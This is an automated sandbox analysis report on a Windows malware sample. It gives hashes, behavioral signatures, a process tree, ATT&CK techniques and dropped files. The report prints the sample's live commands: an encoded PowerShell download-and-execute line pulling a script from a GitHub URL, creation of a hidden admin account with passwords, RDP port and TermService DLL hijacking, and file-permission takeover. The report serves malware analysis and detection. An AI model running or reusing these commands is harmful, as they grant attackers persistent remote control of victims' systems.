Analysis

  • max time kernel
    128s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    11-11-2020 11:08

General

  • Target

    f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe

  • Size

    3.4MB

  • MD5

    09fd827d8b404557a5c9e06810247c12

  • SHA1

    592cec34a644689ea9337a1da194707f795adc14

  • SHA256

    f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342

  • SHA512

    6808ccdda230ad235cd6322c264c834783febd71a6f658f7d81df30c1689bf10c0b305978f65d1c4c572d0afce2b811b32494ed3f3f476e97ffc923c5c18060a

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 10 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 41 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 127 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
    "C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:788
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3fdmatla\3fdmatla.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES392A.tmp" "c:\Users\Admin\AppData\Local\Temp\3fdmatla\CSCD987692627D4782A9F2CD812F71E768.TMP"
          4⤵
            PID:588
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1644
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1708
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:344
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1612
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1580
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1268
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1220
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1000
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1628
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1012
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1472
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:396
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1928
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:924
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1156
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1924
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:968
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                    PID:664
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start TermService
                      4⤵
                        PID:556
                        • C:\Windows\system32\net.exe
                          net start TermService
                          5⤵
                            PID:1108
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 start TermService
                              6⤵
                                PID:564
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                          3⤵
                            PID:1400
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                            3⤵
                              PID:544
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe user updwin Ghasar4f5 /del
                          1⤵
                            PID:1612
                            • C:\Windows\system32\net.exe
                              net.exe user updwin Ghasar4f5 /del
                              2⤵
                                PID:1536
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user updwin Ghasar4f5 /del
                                  3⤵
                                    PID:788
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user updwin 6gZr7N5R /add
                                1⤵
                                  PID:1220
                                  • C:\Windows\system32\net.exe
                                    net.exe user updwin 6gZr7N5R /add
                                    2⤵
                                      PID:280
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user updwin 6gZr7N5R /add
                                        3⤵
                                          PID:332
                                    • C:\Windows\System32\cmd.exe
                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                                      1⤵
                                        PID:1176
                                        • C:\Windows\system32\net.exe
                                          net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                                          2⤵
                                            PID:308
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
                                              3⤵
                                                PID:2004
                                          • C:\Windows\System32\cmd.exe
                                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                            1⤵
                                              PID:1156
                                              • C:\Windows\system32\net.exe
                                                net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                2⤵
                                                  PID:952
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                    3⤵
                                                      PID:1648
                                                • C:\Windows\System32\cmd.exe
                                                  cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
                                                  1⤵
                                                    PID:1644
                                                    • C:\Windows\system32\net.exe
                                                      net.exe LOCALGROUP "Administrators" updwin /ADD
                                                      2⤵
                                                        PID:792
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
                                                          3⤵
                                                            PID:1536
                                                      • C:\Windows\System32\cmd.exe
                                                        cmd /C net.exe user updwin 6gZr7N5R
                                                        1⤵
                                                          PID:1772
                                                          • C:\Windows\system32\net.exe
                                                            net.exe user updwin 6gZr7N5R
                                                            2⤵
                                                              PID:1472
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user updwin 6gZr7N5R
                                                                3⤵
                                                                  PID:472
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd.exe /C wmic path win32_VideoController get name
                                                              1⤵
                                                                PID:1596
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic path win32_VideoController get name
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2020
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C wmic CPU get NAME
                                                                1⤵
                                                                  PID:972
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic CPU get NAME
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:340
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                  1⤵
                                                                    PID:792
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                      2⤵
                                                                        PID:276
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          3⤵
                                                                          • Blacklisted process makes network request
                                                                          • Drops file in Windows directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:332

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Persistence

                                                                    Account Manipulation

                                                                    1
                                                                    T1098

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Modify Existing Service

                                                                    1
                                                                    T1031

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    3
                                                                    T1112

                                                                    File Permissions Modification

                                                                    1
                                                                    T1222

                                                                    Lateral Movement

                                                                    Remote Desktop Protocol

                                                                    1
                                                                    T1076

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\3fdmatla\3fdmatla.dll
                                                                      MD5

                                                                      f2b7bee0582939c638c315e72c1f55a6

                                                                      SHA1

                                                                      5987b3044b352461e240118aec3e7ce149314fed

                                                                      SHA256

                                                                      06c3c36100da8cd9f09ffd2df1fdfc0c727c3c84fe6594e181469ba8af121ea2

                                                                      SHA512

                                                                      92f69ddb449555c6e204d5d7963553efa3af3784c17424476f7879a28a5bcf6cd1fd7de3bca3444499dac9d5b85e7e2970b8d1ea39b3d7a584cd2a774b882987

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES392A.tmp
                                                                      MD5

                                                                      9ae0d1e01a4bd5c6d9433ce84e90fc2c

                                                                      SHA1

                                                                      bdbb9b0704c1a0cd0e560e53c0cad90faf7ee0ca

                                                                      SHA256

                                                                      1294fcecdb147223feb5a94c00a3e8a2dd2ade1f56ba49dee0f875b3ca389723

                                                                      SHA512

                                                                      bc05bb2972dd15e21772e5a9804392150508019d0c50dad662e3f89c6f96fd230ecadd33af47f76f1dadd7118a05390f932dfe9dbef17e1d0b40a9a7edac91a4

                                                                    • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                                                      MD5

                                                                      dac6b25db50155c0c78d5bf64fb95fa3

                                                                      SHA1

                                                                      9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

                                                                      SHA256

                                                                      6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

                                                                      SHA512

                                                                      679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

                                                                    • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                                                      MD5

                                                                      7cac19b2868c41555db4b71219217f9b

                                                                      SHA1

                                                                      d6f77db578db3c5c572c3a944d9072ed00560dcb

                                                                      SHA256

                                                                      d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

                                                                      SHA512

                                                                      5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

                                                                    • C:\Windows\system32\rfxvmt.dll
                                                                      MD5

                                                                      dc39d23e4c0e681fad7a3e1342a2843c

                                                                      SHA1

                                                                      58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                      SHA256

                                                                      6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                      SHA512

                                                                      5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                    • \??\PIPE\lsarpc
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\3fdmatla\3fdmatla.0.cs
                                                                      MD5

                                                                      6f235215132cdebacd0f793fe970d0e3

                                                                      SHA1

                                                                      2841e44c387ed3b6f293611992f1508fe9b55b89

                                                                      SHA256

                                                                      ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                                                      SHA512

                                                                      a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\3fdmatla\3fdmatla.cmdline
                                                                      MD5

                                                                      b5354e7f8a667de119bfef52fc184a57

                                                                      SHA1

                                                                      476d3b2c8da179a9190b80fb8c4a9987176cf10f

                                                                      SHA256

                                                                      9c3294f235601e99d918e40270c737eb1268023c86b985cf953fd01f33cd89de

                                                                      SHA512

                                                                      c4dfa168f096c324a95614dc9ad52c06dc928f6b9b7f7b0f63ddd14ffd0eb64ece2d57ad85f34d527ff1c7d8fc1950e98175321457121b8c325c40d7d597d47d

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\3fdmatla\CSCD987692627D4782A9F2CD812F71E768.TMP
                                                                      MD5

                                                                      2267d5a9aa169e553f45e96a423be541

                                                                      SHA1

                                                                      277f6009bd99011532133bcc925e464ccbf31661

                                                                      SHA256

                                                                      984b4ea930348595c1c83933797c57e5318307cb2dbc8e273a1bc199afd9f81b

                                                                      SHA512

                                                                      4441fc094ec39a0961f56ca98d548df58e5e32d24a597b8ba5f3655d78d432a79956ae4032ee4b2a93346548dacff2301834174dbef24c5cc7361be4fb4aad0f

                                                                    • \Windows\Branding\mediasrv.png
                                                                      MD5

                                                                      eeb448ea2709c57b9ea2e223d0c79396

                                                                      SHA1

                                                                      38331dd027386151ee37a29a7820570a76427b02

                                                                      SHA256

                                                                      c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

                                                                      SHA512

                                                                      c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

                                                                    • \Windows\Branding\mediasvc.png
                                                                      MD5

                                                                      bb873bd05a47f502ee4ed3c4ea749a4f

                                                                      SHA1

                                                                      e55a6bf49a4833fb9e9b123df39dac9bf507f75a

                                                                      SHA256

                                                                      a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

                                                                      SHA512

                                                                      ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

                                                                    • memory/276-80-0x0000000000000000-mapping.dmp
                                                                    • memory/280-63-0x0000000000000000-mapping.dmp
                                                                    • memory/308-65-0x0000000000000000-mapping.dmp
                                                                    • memory/332-116-0x0000000019FC0000-0x0000000019FC1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-98-0x0000000001140000-0x0000000001141000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-97-0x0000000001130000-0x0000000001131000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-117-0x000000001ABB0000-0x000000001ABB1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-82-0x000007FEF5590000-0x000007FEF5F7C000-memory.dmp
                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/332-81-0x0000000000000000-mapping.dmp
                                                                    • memory/332-99-0x00000000192E0000-0x00000000192E1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-108-0x0000000019480000-0x0000000019481000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-64-0x0000000000000000-mapping.dmp
                                                                    • memory/332-92-0x00000000010E0000-0x00000000010E1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-100-0x0000000019480000-0x0000000019481000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-109-0x000000001AB20000-0x000000001AB21000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/332-101-0x0000000019490000-0x0000000019491000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/340-79-0x0000000000000000-mapping.dmp
                                                                    • memory/344-40-0x0000000000000000-mapping.dmp
                                                                    • memory/396-10-0x0000000000000000-mapping.dmp
                                                                    • memory/396-49-0x0000000000000000-mapping.dmp
                                                                    • memory/472-76-0x0000000000000000-mapping.dmp
                                                                    • memory/544-88-0x0000000000000000-mapping.dmp
                                                                    • memory/556-56-0x0000000000000000-mapping.dmp
                                                                    • memory/564-58-0x0000000000000000-mapping.dmp
                                                                    • memory/588-13-0x0000000000000000-mapping.dmp
                                                                    • memory/664-55-0x0000000000000000-mapping.dmp
                                                                    • memory/788-0-0x0000000001360000-0x000000000169D000-memory.dmp
                                                                      Filesize

                                                                      3.2MB

                                                                    • memory/788-1-0x00000000016A0000-0x00000000016B1000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/788-62-0x0000000000000000-mapping.dmp
                                                                    • memory/792-72-0x0000000000000000-mapping.dmp
                                                                    • memory/924-51-0x0000000000000000-mapping.dmp
                                                                    • memory/952-69-0x0000000000000000-mapping.dmp
                                                                    • memory/968-54-0x0000000000000000-mapping.dmp
                                                                    • memory/1000-45-0x0000000000000000-mapping.dmp
                                                                    • memory/1012-47-0x0000000000000000-mapping.dmp
                                                                    • memory/1108-57-0x0000000000000000-mapping.dmp
                                                                    • memory/1156-52-0x0000000000000000-mapping.dmp
                                                                    • memory/1220-44-0x0000000000000000-mapping.dmp
                                                                    • memory/1268-43-0x0000000000000000-mapping.dmp
                                                                    • memory/1400-87-0x0000000000000000-mapping.dmp
                                                                    • memory/1472-75-0x0000000000000000-mapping.dmp
                                                                    • memory/1472-48-0x0000000000000000-mapping.dmp
                                                                    • memory/1536-61-0x0000000000000000-mapping.dmp
                                                                    • memory/1536-73-0x0000000000000000-mapping.dmp
                                                                    • memory/1568-21-0x000000001AB10000-0x000000001AB11000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-17-0x00000000026C0000-0x00000000026C1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-2-0x0000000000000000-mapping.dmp
                                                                    • memory/1568-3-0x000007FEF5590000-0x000007FEF5F7C000-memory.dmp
                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/1568-4-0x0000000002000000-0x0000000002001000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-5-0x000000001AE00000-0x000000001AE01000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-6-0x00000000025F0000-0x00000000025F1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-7-0x0000000002550000-0x0000000002551000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-38-0x0000000001F80000-0x0000000001F90000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/1568-9-0x0000000002880000-0x0000000002881000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-35-0x000000001B8B0000-0x000000001B8B1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-34-0x0000000001FC0000-0x0000000001FC1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-18-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1568-33-0x0000000001FB0000-0x0000000001FB1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1580-42-0x0000000000000000-mapping.dmp
                                                                    • memory/1612-41-0x0000000000000000-mapping.dmp
                                                                    • memory/1628-46-0x0000000000000000-mapping.dmp
                                                                    • memory/1644-36-0x0000000000000000-mapping.dmp
                                                                    • memory/1648-70-0x0000000000000000-mapping.dmp
                                                                    • memory/1708-39-0x0000000000000000-mapping.dmp
                                                                    • memory/1924-53-0x0000000000000000-mapping.dmp
                                                                    • memory/1928-50-0x0000000000000000-mapping.dmp
                                                                    • memory/2004-66-0x0000000000000000-mapping.dmp
                                                                    • memory/2020-78-0x0000000000000000-mapping.dmp